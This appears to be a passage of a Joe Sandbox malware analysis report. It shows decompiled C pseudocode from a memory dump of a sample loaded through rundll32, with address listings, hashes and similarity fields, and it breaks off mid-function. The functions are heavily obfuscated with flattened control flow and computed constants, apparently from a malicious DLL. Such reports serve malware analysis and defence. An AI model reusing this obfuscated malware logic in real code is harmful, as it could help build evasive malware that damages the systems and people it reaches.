                                                                                                                                                            0x0037a13e
                                                                                                                                                            0x0037a1af
                                                                                                                                                            0x0037a1b7
                                                                                                                                                            0x0037a1d7
                                                                                                                                                            0x0037a1dc
                                                                                                                                                            0x0037a1e7
                                                                                                                                                            0x0037a1ed
                                                                                                                                                            0x0037a111
                                                                                                                                                            0x0037a111
                                                                                                                                                            0x0037a113
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a113
                                                                                                                                                            0x0037a111
                                                                                                                                                            0x0037a146
                                                                                                                                                            0x0037a192
                                                                                                                                                            0x0037a197
                                                                                                                                                            0x0037a199
                                                                                                                                                            0x0037a19c
                                                                                                                                                            0x0037a19f
                                                                                                                                                            0x0037a30b
                                                                                                                                                            0x0037a30b
                                                                                                                                                            0x0037a30b
                                                                                                                                                            0x0037a1a5
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a1a5
                                                                                                                                                            0x0037a14e
                                                                                                                                                            0x0037a2f9
                                                                                                                                                            0x0037a2f9
                                                                                                                                                            0x0037a2ff
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a2ff
                                                                                                                                                            0x0037a161
                                                                                                                                                            0x0037a16c
                                                                                                                                                            0x0037a16e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a16e
                                                                                                                                                            0x0037a2eb
                                                                                                                                                            0x0037a2f3
                                                                                                                                                            0x0037a2f8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037a2f8

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: H&!$Up7$yBd&
                                                                                                                                                            • API String ID: 0-2352930472
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                            			E003895FA() {
                                                                                                                                                            				char _v524;
                                                                                                                                                            				signed int _v532;
                                                                                                                                                            				intOrPtr _v536;
                                                                                                                                                            				intOrPtr _v540;
                                                                                                                                                            				intOrPtr _v544;
                                                                                                                                                            				intOrPtr _v548;
                                                                                                                                                            				intOrPtr _v552;
                                                                                                                                                            				intOrPtr _v556;
                                                                                                                                                            				intOrPtr _v560;
                                                                                                                                                            				char _v564;
                                                                                                                                                            				intOrPtr _v568;
                                                                                                                                                            				char _v572;
                                                                                                                                                            				signed int _v576;
                                                                                                                                                            				signed int _v580;
                                                                                                                                                            				signed int _v584;
                                                                                                                                                            				signed int _v588;
                                                                                                                                                            				signed int _v592;
                                                                                                                                                            				signed int _v596;
                                                                                                                                                            				signed int _v600;
                                                                                                                                                            				signed int _v604;
                                                                                                                                                            				signed int _v608;
                                                                                                                                                            				signed int _v612;
                                                                                                                                                            				signed int _v616;
                                                                                                                                                            				signed int _v620;
                                                                                                                                                            				signed int _v624;
                                                                                                                                                            				signed int _v628;
                                                                                                                                                            				signed int _v632;
                                                                                                                                                            				signed int _v636;
                                                                                                                                                            				signed int _v640;
                                                                                                                                                            				signed int _v644;
                                                                                                                                                            				signed int _v648;
                                                                                                                                                            				signed int _v652;
                                                                                                                                                            				signed int _v656;
                                                                                                                                                            				signed int _v660;
                                                                                                                                                            				signed int _v664;
                                                                                                                                                            				signed int _v668;
                                                                                                                                                            				signed int _v672;
                                                                                                                                                            				signed int _v676;
                                                                                                                                                            				signed int _v680;
                                                                                                                                                            				signed int _v684;
                                                                                                                                                            				signed int _v688;
                                                                                                                                                            				intOrPtr _t295;
                                                                                                                                                            				void* _t297;
                                                                                                                                                            				void* _t298;
                                                                                                                                                            				intOrPtr _t299;
                                                                                                                                                            				signed int _t306;
                                                                                                                                                            				void* _t309;
                                                                                                                                                            				void* _t310;
                                                                                                                                                            				char _t311;
                                                                                                                                                            				void* _t317;
                                                                                                                                                            				intOrPtr _t334;
                                                                                                                                                            				signed int _t341;
                                                                                                                                                            				signed int _t342;
                                                                                                                                                            				signed int _t343;
                                                                                                                                                            				signed int _t344;
                                                                                                                                                            				void* _t347;
                                                                                                                                                            
                                                                                                                                                            				_v668 = 0xe6fb93;
                                                                                                                                                            				_v668 = _v668 + 0xffff1eed;
                                                                                                                                                            				_t310 = 0xada6804;
                                                                                                                                                            				_v668 = _v668 * 0x61;
                                                                                                                                                            				_t309 = 0;
                                                                                                                                                            				_v668 = _v668 ^ 0xaca28cc6;
                                                                                                                                                            				_v668 = _v668 ^ 0xfb928647;
                                                                                                                                                            				_v616 = 0x8caf33;
                                                                                                                                                            				_t341 = 0x42;
                                                                                                                                                            				_v616 = _v616 * 0x25;
                                                                                                                                                            				_v616 = _v616 * 0x4f;
                                                                                                                                                            				_v616 = _v616 ^ 0x46546a51;
                                                                                                                                                            				_v620 = 0x861136;
                                                                                                                                                            				_v620 = _v620 | 0x52f06d4d;
                                                                                                                                                            				_v620 = _v620 >> 0xf;
                                                                                                                                                            				_v620 = _v620 ^ 0x0000a5ef;
                                                                                                                                                            				_v628 = 0x4cf396;
                                                                                                                                                            				_v628 = _v628 >> 1;
                                                                                                                                                            				_v628 = _v628 >> 9;
                                                                                                                                                            				_v628 = _v628 ^ 0x0000133c;
                                                                                                                                                            				_v684 = 0xc54e58;
                                                                                                                                                            				_v684 = _v684 >> 2;
                                                                                                                                                            				_v684 = _v684 ^ 0xb8bf25ee;
                                                                                                                                                            				_v684 = _v684 >> 2;
                                                                                                                                                            				_v684 = _v684 ^ 0x2e259ad3;
                                                                                                                                                            				_v592 = 0x68267f;
                                                                                                                                                            				_v592 = _v592 + 0xffff39c4;
                                                                                                                                                            				_v592 = _v592 ^ 0x006c60f9;
                                                                                                                                                            				_v632 = 0xa1d089;
                                                                                                                                                            				_v632 = _v632 / _t341;
                                                                                                                                                            				_v632 = _v632 ^ 0x52222b14;
                                                                                                                                                            				_v632 = _v632 ^ 0x5220bcfc;
                                                                                                                                                            				_v608 = 0x39d352;
                                                                                                                                                            				_v608 = _v608 | 0x2e7e1ae1;
                                                                                                                                                            				_v608 = _v608 ^ 0x576cc274;
                                                                                                                                                            				_v608 = _v608 ^ 0x7911cf35;
                                                                                                                                                            				_v660 = 0xc26f36;
                                                                                                                                                            				_v660 = _v660 ^ 0x9f5dc88a;
                                                                                                                                                            				_v660 = _v660 ^ 0xeefda613;
                                                                                                                                                            				_t342 = 0x3f;
                                                                                                                                                            				_v660 = _v660 / _t342;
                                                                                                                                                            				_v660 = _v660 ^ 0x01ce77bb;
                                                                                                                                                            				_v624 = 0x334861;
                                                                                                                                                            				_v624 = _v624 + 0xffff4b1a;
                                                                                                                                                            				_t343 = 0x2a;
                                                                                                                                                            				_v624 = _v624 * 0x2f;
                                                                                                                                                            				_v624 = _v624 ^ 0x0947e580;
                                                                                                                                                            				_v652 = 0xab72b9;
                                                                                                                                                            				_v652 = _v652 << 8;
                                                                                                                                                            				_v652 = _v652 / _t343;
                                                                                                                                                            				_v652 = _v652 ^ 0x0419701b;
                                                                                                                                                            				_v688 = 0x507748;
                                                                                                                                                            				_v688 = _v688 << 5;
                                                                                                                                                            				_v688 = _v688 + 0xffff449a;
                                                                                                                                                            				_v688 = _v688 + 0xb858;
                                                                                                                                                            				_v688 = _v688 ^ 0x0a0a66f0;
                                                                                                                                                            				_v600 = 0x95cabc;
                                                                                                                                                            				_v600 = _v600 + 0xffffb185;
                                                                                                                                                            				_v600 = _v600 << 9;
                                                                                                                                                            				_v600 = _v600 ^ 0x2af43595;
                                                                                                                                                            				_v580 = 0x7e3ec7;
                                                                                                                                                            				_v580 = _v580 ^ 0x09caac24;
                                                                                                                                                            				_v580 = _v580 ^ 0x09b70662;
                                                                                                                                                            				_v612 = 0xa526a8;
                                                                                                                                                            				_v612 = _v612 | 0x64dab874;
                                                                                                                                                            				_v612 = _v612 >> 0xe;
                                                                                                                                                            				_v612 = _v612 ^ 0x0006f9eb;
                                                                                                                                                            				_v604 = 0xb7de18;
                                                                                                                                                            				_t344 = 0x48;
                                                                                                                                                            				_v604 = _v604 * 0x79;
                                                                                                                                                            				_v604 = _v604 * 0x31;
                                                                                                                                                            				_v604 = _v604 ^ 0xa26ee4e9;
                                                                                                                                                            				_v640 = 0x553c00;
                                                                                                                                                            				_v640 = _v640 + 0xffff4196;
                                                                                                                                                            				_v640 = _v640 + 0xffff8daf;
                                                                                                                                                            				_v640 = _v640 ^ 0x00577a07;
                                                                                                                                                            				_v576 = 0xaac37;
                                                                                                                                                            				_v576 = _v576 * 0x77;
                                                                                                                                                            				_v576 = _v576 ^ 0x04fc3a71;
                                                                                                                                                            				_v676 = 0xb6ce7b;
                                                                                                                                                            				_v676 = _v676 >> 1;
                                                                                                                                                            				_v676 = _v676 * 0x28;
                                                                                                                                                            				_v676 = _v676 >> 0xb;
                                                                                                                                                            				_v676 = _v676 ^ 0x000b20b4;
                                                                                                                                                            				_v584 = 0x4877b4;
                                                                                                                                                            				_v584 = _v584 << 1;
                                                                                                                                                            				_v584 = _v584 ^ 0x009148e9;
                                                                                                                                                            				_v588 = 0xaf1c90;
                                                                                                                                                            				_v588 = _v588 * 0x5b;
                                                                                                                                                            				_v588 = _v588 ^ 0x3e3937c6;
                                                                                                                                                            				_v644 = 0x150bb3;
                                                                                                                                                            				_v644 = _v644 + 0x865c;
                                                                                                                                                            				_v644 = _v644 + 0x5404;
                                                                                                                                                            				_v644 = _v644 ^ 0x001dce65;
                                                                                                                                                            				_v648 = 0xaa3958;
                                                                                                                                                            				_v648 = _v648 / _t344;
                                                                                                                                                            				_v648 = _v648 >> 0xe;
                                                                                                                                                            				_v648 = _v648 ^ 0x000a9525;
                                                                                                                                                            				_v596 = 0xdb2add;
                                                                                                                                                            				_v596 = _v596 << 0xd;
                                                                                                                                                            				_v596 = _v596 ^ 0x65528fd4;
                                                                                                                                                            				_v680 = 0xd04d0c;
                                                                                                                                                            				_v680 = _v680 << 5;
                                                                                                                                                            				_t340 = _v596;
                                                                                                                                                            				_v680 = _v680 * 0x55;
                                                                                                                                                            				_v680 = _v680 | 0x96843ebb;
                                                                                                                                                            				_v680 = _v680 ^ 0xb7be4a39;
                                                                                                                                                            				_v656 = 0x2591b4;
                                                                                                                                                            				_v656 = _v656 ^ 0x7517a4f1;
                                                                                                                                                            				_v656 = _v656 ^ 0xb20365ef;
                                                                                                                                                            				_v656 = _v656 + 0xffff4c4f;
                                                                                                                                                            				_v656 = _v656 ^ 0xc733773b;
                                                                                                                                                            				_v636 = 0xbfc674;
                                                                                                                                                            				_v636 = _v636 * 0x1d;
                                                                                                                                                            				_v636 = _v636 << 6;
                                                                                                                                                            				_v636 = _v636 ^ 0x6e5b8cbc;
                                                                                                                                                            				_v664 = 0x3235cc;
                                                                                                                                                            				_v664 = _v664 << 1;
                                                                                                                                                            				_v664 = _v664 | 0x857b9d7f;
                                                                                                                                                            				_v664 = _v664 * 0x28;
                                                                                                                                                            				_v664 = _v664 ^ 0xdbf98c50;
                                                                                                                                                            				_v672 = 0xb181ad;
                                                                                                                                                            				_v672 = _v672 >> 0xa;
                                                                                                                                                            				_v672 = _v672 << 2;
                                                                                                                                                            				_v672 = _v672 ^ 0xdb7e6d02;
                                                                                                                                                            				_v672 = _v672 ^ 0xdb78e9e9;
                                                                                                                                                            				do {
                                                                                                                                                            					while(_t310 != 0x10c1a7f) {
                                                                                                                                                            						if(_t310 == 0x31db0c0) {
                                                                                                                                                            							_t311 = _v572;
                                                                                                                                                            							_t295 = _v568;
                                                                                                                                                            							_push(_t311);
                                                                                                                                                            							_v560 = _t295;
                                                                                                                                                            							_v552 = _t295;
                                                                                                                                                            							_v544 = _t295;
                                                                                                                                                            							_v536 = _t295;
                                                                                                                                                            							_v564 = _t311;
                                                                                                                                                            							_v556 = _t311;
                                                                                                                                                            							_v548 = _t311;
                                                                                                                                                            							_v540 = _t311;
                                                                                                                                                            							_v532 = _v628;
                                                                                                                                                            							_t297 = E00375DDD( &_v564, _t340, _v644, _v648, _t311, _v596, _v680);
                                                                                                                                                            							_t347 = _t347 + 0x18;
                                                                                                                                                            							__eflags = _t297;
                                                                                                                                                            							_t309 =  !=  ? 1 : _t309;
                                                                                                                                                            							_t310 = 0x48f7cbb;
                                                                                                                                                            							continue;
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t310 == 0x461819e) {
                                                                                                                                                            								_push(_v660);
                                                                                                                                                            								_push(_v608);
                                                                                                                                                            								_t298 = E0038DCF7(_v632, 0x371000, __eflags);
                                                                                                                                                            								_pop(_t317);
                                                                                                                                                            								_t299 =  *0x393e10; // 0x0
                                                                                                                                                            								_t334 =  *0x393e10; // 0x0
                                                                                                                                                            								E003747CE(_t334 + 0x23c, _v624, _t317, _v652, _v688, _t298, _t299 + 0x1c, _v600, _v580);
                                                                                                                                                            								E0037A8B0(_v612, _t298, _v604);
                                                                                                                                                            								_t347 = _t347 + 0x24;
                                                                                                                                                            								_t310 = 0xa22489e;
                                                                                                                                                            								continue;
                                                                                                                                                            							} else {
                                                                                                                                                            								if(_t310 == 0x48f7cbb) {
                                                                                                                                                            									E00381E67(_v656, _v636, _v664, _v672, _t340);
                                                                                                                                                            								} else {
                                                                                                                                                            									if(_t310 == 0xa22489e) {
                                                                                                                                                            										_t306 = E00378F65(_v640, _v576,  &_v524, _v676, 0, _t310, _v616, _v584, _v620, _v588, _t310, _v668);
                                                                                                                                                            										_t340 = _t306;
                                                                                                                                                            										_t347 = _t347 + 0x28;
                                                                                                                                                            										__eflags = _t306 - 0xffffffff;
                                                                                                                                                            										if(__eflags != 0) {
                                                                                                                                                            											_t310 = 0x31db0c0;
                                                                                                                                                            											continue;
                                                                                                                                                            										}
                                                                                                                                                            									} else {
                                                                                                                                                            										if(_t310 == 0xada6804) {
                                                                                                                                                            											_t310 = 0xcbcd90e;
                                                                                                                                                            											continue;
                                                                                                                                                            										} else {
                                                                                                                                                            											if(_t310 != 0xcbcd90e) {
                                                                                                                                                            												goto L15;
                                                                                                                                                            											} else {
                                                                                                                                                            												E0038C1EC(_v684, _v592,  &_v572);
                                                                                                                                                            												_t310 = 0x10c1a7f;
                                                                                                                                                            												continue;
                                                                                                                                                            											}
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L18:
                                                                                                                                                            						return _t309;
                                                                                                                                                            					}
                                                                                                                                                            					_v572 = _v572 - E0038ABD1();
                                                                                                                                                            					_t310 = 0x461819e;
                                                                                                                                                            					asm("sbb [esp+0x8c], edx");
                                                                                                                                                            					L15:
                                                                                                                                                            					__eflags = _t310 - 0x7e6efe8;
                                                                                                                                                            				} while (__eflags != 0);
                                                                                                                                                            				goto L18;
                                                                                                                                                            			}



























































                                                                                                                                                            0x0038991d
                                                                                                                                                            0x00389927
                                                                                                                                                            0x0038992b
                                                                                                                                                            0x0038992f
                                                                                                                                                            0x00389937
                                                                                                                                                            0x0038993f
                                                                                                                                                            0x00389947
                                                                                                                                                            0x0038994f
                                                                                                                                                            0x00389957
                                                                                                                                                            0x0038995f
                                                                                                                                                            0x00389967
                                                                                                                                                            0x00389974
                                                                                                                                                            0x00389978
                                                                                                                                                            0x0038997d
                                                                                                                                                            0x00389985
                                                                                                                                                            0x0038998d
                                                                                                                                                            0x00389991
                                                                                                                                                            0x0038999e
                                                                                                                                                            0x003899a2
                                                                                                                                                            0x003899aa
                                                                                                                                                            0x003899b2
                                                                                                                                                            0x003899b7
                                                                                                                                                            0x003899bc
                                                                                                                                                            0x003899c4
                                                                                                                                                            0x003899cc
                                                                                                                                                            0x003899cc
                                                                                                                                                            0x003899da
                                                                                                                                                            0x00389afd
                                                                                                                                                            0x00389b06
                                                                                                                                                            0x00389b0d
                                                                                                                                                            0x00389b0e
                                                                                                                                                            0x00389b15
                                                                                                                                                            0x00389b1c
                                                                                                                                                            0x00389b23
                                                                                                                                                            0x00389b32
                                                                                                                                                            0x00389b3d
                                                                                                                                                            0x00389b49
                                                                                                                                                            0x00389b54
                                                                                                                                                            0x00389b62
                                                                                                                                                            0x00389b69
                                                                                                                                                            0x00389b70
                                                                                                                                                            0x00389b74
                                                                                                                                                            0x00389b76
                                                                                                                                                            0x00389b79
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003899e0
                                                                                                                                                            0x003899e6
                                                                                                                                                            0x00389a87
                                                                                                                                                            0x00389a90
                                                                                                                                                            0x00389a98
                                                                                                                                                            0x00389a9e
                                                                                                                                                            0x00389aac
                                                                                                                                                            0x00389ac3
                                                                                                                                                            0x00389ad6
                                                                                                                                                            0x00389aeb
                                                                                                                                                            0x00389af0
                                                                                                                                                            0x00389af3
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003899ec
                                                                                                                                                            0x003899f2
                                                                                                                                                            0x00389bba
                                                                                                                                                            0x003899f8
                                                                                                                                                            0x003899fe
                                                                                                                                                            0x00389a6d
                                                                                                                                                            0x00389a72
                                                                                                                                                            0x00389a74
                                                                                                                                                            0x00389a77
                                                                                                                                                            0x00389a7a
                                                                                                                                                            0x00389a80
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00389a80
                                                                                                                                                            0x00389a00
                                                                                                                                                            0x00389a06
                                                                                                                                                            0x00389a31
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00389a08
                                                                                                                                                            0x00389a0e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00389a14
                                                                                                                                                            0x00389a24
                                                                                                                                                            0x00389a2a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00389a2a
                                                                                                                                                            0x00389a0e
                                                                                                                                                            0x00389a06
                                                                                                                                                            0x003899fe
                                                                                                                                                            0x003899f2
                                                                                                                                                            0x003899e6
                                                                                                                                                            0x00389bc5
                                                                                                                                                            0x00389bce
                                                                                                                                                            0x00389bce
                                                                                                                                                            0x00389b88
                                                                                                                                                            0x00389b8f
                                                                                                                                                            0x00389b94
                                                                                                                                                            0x00389b9b
                                                                                                                                                            0x00389b9b
                                                                                                                                                            0x00389b9b
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: HwP$QjTF$aH3
                                                                                                                                                            • API String ID: 0-3950587752
                                                                                                                                                            • Opcode ID: 5eb9cf9e83c2ab0051b1dd1c5aa16a4083fc16ca6d4a5686a6790ffc6f588a01
                                                                                                                                                            • Instruction ID: 02f467d4d23e4da8b618d741899a997c3cff180fca8e55f8eb3b92d7f7dcb2bf
                                                                                                                                                            • Opcode Fuzzy Hash: 5eb9cf9e83c2ab0051b1dd1c5aa16a4083fc16ca6d4a5686a6790ffc6f588a01
                                                                                                                                                            • Instruction Fuzzy Hash: 66E11F714093819FD369DF25C58A61BBBF1FBC4748F208A1EF29A86260D7B58949CF43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                            			E0037B2C7(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                            				char _v40;
                                                                                                                                                            				char _v48;
                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                            				intOrPtr _v80;
                                                                                                                                                            				intOrPtr _v84;
                                                                                                                                                            				intOrPtr _v92;
                                                                                                                                                            				char _v108;
                                                                                                                                                            				char _v112;
                                                                                                                                                            				signed int _v116;
                                                                                                                                                            				signed int _v120;
                                                                                                                                                            				signed int _v124;
                                                                                                                                                            				signed int _v128;
                                                                                                                                                            				signed int _v132;
                                                                                                                                                            				signed int _v136;
                                                                                                                                                            				signed int _v140;
                                                                                                                                                            				signed int _v144;
                                                                                                                                                            				signed int _v148;
                                                                                                                                                            				signed int _v152;
                                                                                                                                                            				signed int _v156;
                                                                                                                                                            				void* _t137;
                                                                                                                                                            				intOrPtr* _t157;
                                                                                                                                                            				signed int _t166;
                                                                                                                                                            				void* _t173;
                                                                                                                                                            				intOrPtr _t191;
                                                                                                                                                            				void* _t203;
                                                                                                                                                            				void* _t208;
                                                                                                                                                            				signed int _t209;
                                                                                                                                                            				signed int _t210;
                                                                                                                                                            				signed int _t211;
                                                                                                                                                            				signed int _t212;
                                                                                                                                                            				intOrPtr* _t213;
                                                                                                                                                            				void* _t215;
                                                                                                                                                            				void* _t216;
                                                                                                                                                            				void* _t218;
                                                                                                                                                            
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t137);
                                                                                                                                                            				_v136 = 0x2c5bc;
                                                                                                                                                            				_t216 = _t215 + 0xc;
                                                                                                                                                            				_t208 = 0;
                                                                                                                                                            				_t173 = 0xf62a13b;
                                                                                                                                                            				_t209 = 0x63;
                                                                                                                                                            				_v136 = _v136 / _t209;
                                                                                                                                                            				_v136 = _v136 + 0xe356;
                                                                                                                                                            				_v136 = _v136 ^ 0x000982ba;
                                                                                                                                                            				_v156 = 0x35028b;
                                                                                                                                                            				_v156 = _v156 | 0x143a760d;
                                                                                                                                                            				_v156 = _v156 + 0xfffff236;
                                                                                                                                                            				_v156 = _v156 ^ 0x8a3e1055;
                                                                                                                                                            				_v156 = _v156 ^ 0x9e033c32;
                                                                                                                                                            				_v128 = 0xf43d73;
                                                                                                                                                            				_v128 = _v128 | 0xd1983256;
                                                                                                                                                            				_v128 = _v128 ^ 0xd1f71de4;
                                                                                                                                                            				_v120 = 0x9951cf;
                                                                                                                                                            				_v120 = _v120 + 0xffffd11b;
                                                                                                                                                            				_v120 = _v120 ^ 0x00948e71;
                                                                                                                                                            				_v152 = 0x57fc5b;
                                                                                                                                                            				_v152 = _v152 | 0x88a856bb;
                                                                                                                                                            				_v152 = _v152 << 9;
                                                                                                                                                            				_v152 = _v152 + 0xa27f;
                                                                                                                                                            				_v152 = _v152 ^ 0xfff91174;
                                                                                                                                                            				_v116 = 0x3d6e6b;
                                                                                                                                                            				_t210 = 9;
                                                                                                                                                            				_v116 = _v116 / _t210;
                                                                                                                                                            				_v116 = _v116 ^ 0x0006b75d;
                                                                                                                                                            				_v140 = 0x916f20;
                                                                                                                                                            				_t211 = 0x35;
                                                                                                                                                            				_v140 = _v140 * 0x22;
                                                                                                                                                            				_v140 = _v140 / _t211;
                                                                                                                                                            				_t212 = 0x7b;
                                                                                                                                                            				_v140 = _v140 * 0x1d;
                                                                                                                                                            				_v140 = _v140 ^ 0x0a9423e2;
                                                                                                                                                            				_v148 = 0x96f30f;
                                                                                                                                                            				_v148 = _v148 ^ 0x6547be83;
                                                                                                                                                            				_v148 = _v148 << 9;
                                                                                                                                                            				_v148 = _v148 | 0xa101889a;
                                                                                                                                                            				_v148 = _v148 ^ 0xa391ec3d;
                                                                                                                                                            				_v124 = 0x9e8998;
                                                                                                                                                            				_v124 = _v124 | 0x73c531f9;
                                                                                                                                                            				_v124 = _v124 ^ 0x73d6e9c9;
                                                                                                                                                            				_v132 = 0xda1f74;
                                                                                                                                                            				_v132 = _v132 + 0x97a0;
                                                                                                                                                            				_v132 = _v132 ^ 0xdacfb227;
                                                                                                                                                            				_v132 = _v132 ^ 0xda161b2e;
                                                                                                                                                            				_v144 = 0x87027b;
                                                                                                                                                            				_t213 = _v128;
                                                                                                                                                            				_v144 = _v144 / _t212;
                                                                                                                                                            				_v144 = _v144 + 0x3568;
                                                                                                                                                            				_v144 = _v144 | 0x38a39b99;
                                                                                                                                                            				_v144 = _v144 ^ 0x38a88a96;
                                                                                                                                                            				while(1) {
                                                                                                                                                            					_t218 = _t173 - 0x628c872;
                                                                                                                                                            					if(_t218 > 0) {
                                                                                                                                                            						goto L25;
                                                                                                                                                            					}
                                                                                                                                                            					L2:
                                                                                                                                                            					if(_t218 == 0) {
                                                                                                                                                            						_push(_t173);
                                                                                                                                                            						_push(_t173);
                                                                                                                                                            						_t203 = 0x50;
                                                                                                                                                            						_t213 = E00377FF2(_t203);
                                                                                                                                                            						__eflags = _t213;
                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                            							L16:
                                                                                                                                                            							_t173 = 0xe7b6043;
                                                                                                                                                            							continue;
                                                                                                                                                            							do {
                                                                                                                                                            								while(1) {
                                                                                                                                                            									_t218 = _t173 - 0x628c872;
                                                                                                                                                            									if(_t218 > 0) {
                                                                                                                                                            										goto L25;
                                                                                                                                                            									}
                                                                                                                                                            									goto L2;
                                                                                                                                                            								}
                                                                                                                                                            								goto L25;
                                                                                                                                                            								L45:
                                                                                                                                                            								__eflags = _t173 - 0xee0c843;
                                                                                                                                                            							} while (__eflags != 0);
                                                                                                                                                            							L46:
                                                                                                                                                            							return _t208;
                                                                                                                                                            						}
                                                                                                                                                            						_t173 = 0xf1dea2;
                                                                                                                                                            						 *((intOrPtr*)(_t213 + 0x24)) = _v92;
                                                                                                                                                            						 *((intOrPtr*)(_t213 + 0x3c)) = _v80;
                                                                                                                                                            						 *((intOrPtr*)(_t213 + 0x20)) = _v72;
                                                                                                                                                            						continue;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t173 == 0xf1dea2) {
                                                                                                                                                            						__eflags = _v84 - 1;
                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                            							E00384B87( &_v108);
                                                                                                                                                            							L13:
                                                                                                                                                            							_t173 = 0x4d68783;
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						_t173 = 0x9ca47b0;
                                                                                                                                                            						continue;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t173 == 0x1c23c86) {
                                                                                                                                                            						__eflags = _v84 - 4;
                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                            							E00386DF8( &_v108);
                                                                                                                                                            							goto L13;
                                                                                                                                                            						}
                                                                                                                                                            						_t173 = 0x6a06f56;
                                                                                                                                                            						continue;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t173 == 0x45d7e1c) {
                                                                                                                                                            						_t157 = E0038D97D( &_v40, _v120, __eflags, _v152,  &_v48, _v116);
                                                                                                                                                            						_t216 = _t216 + 0xc;
                                                                                                                                                            						__eflags = _t157;
                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                            							goto L46;
                                                                                                                                                            						}
                                                                                                                                                            						goto L16;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t173 == 0x483085d) {
                                                                                                                                                            						__eflags = _v84 - 7;
                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                            							E00380E53( &_v108);
                                                                                                                                                            						}
                                                                                                                                                            						goto L13;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t173 == 0x4d68783) {
                                                                                                                                                            						_t191 =  *0x393208; // 0x0
                                                                                                                                                            						_t208 = _t208 + 1;
                                                                                                                                                            						 *_t213 =  *((intOrPtr*)(_t191 + 0x20c));
                                                                                                                                                            						 *((intOrPtr*)(_t191 + 0x20c)) = _t213;
                                                                                                                                                            						L10:
                                                                                                                                                            						_t173 = 0x45d7e1c;
                                                                                                                                                            						continue;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t173 != 0x4fb7fc6) {
                                                                                                                                                            						goto L45;
                                                                                                                                                            					}
                                                                                                                                                            					E00380B19(0);
                                                                                                                                                            					goto L10;
                                                                                                                                                            					L25:
                                                                                                                                                            					__eflags = _t173 - 0x6a06f56;
                                                                                                                                                            					if(_t173 == 0x6a06f56) {
                                                                                                                                                            						__eflags = _v84 - 5;
                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                            							E0037B74D( &_v108, _t213);
                                                                                                                                                            							_t173 = 0x4d68783;
                                                                                                                                                            							goto L45;
                                                                                                                                                            						}
                                                                                                                                                            						_t173 = 0xcf2e7b4;
                                                                                                                                                            						continue;
                                                                                                                                                            					}
                                                                                                                                                            					__eflags = _t173 - 0x9a20357;
                                                                                                                                                            					if(_t173 == 0x9a20357) {
                                                                                                                                                            						__eflags = _v84 - 3;
                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                            							E00381889( &_v108);
                                                                                                                                                            							goto L13;
                                                                                                                                                            						}
                                                                                                                                                            						_t173 = 0x1c23c86;
                                                                                                                                                            						continue;
                                                                                                                                                            					}
                                                                                                                                                            					__eflags = _t173 - 0x9ca47b0;
                                                                                                                                                            					if(_t173 == 0x9ca47b0) {
                                                                                                                                                            						__eflags = _v84 - 2;
                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                            							E00379714( &_v108, _t213);
                                                                                                                                                            							goto L13;
                                                                                                                                                            						}
                                                                                                                                                            						_t173 = 0x9a20357;
                                                                                                                                                            						continue;
                                                                                                                                                            					}
                                                                                                                                                            					__eflags = _t173 - 0xcf2e7b4;
                                                                                                                                                            					if(_t173 == 0xcf2e7b4) {
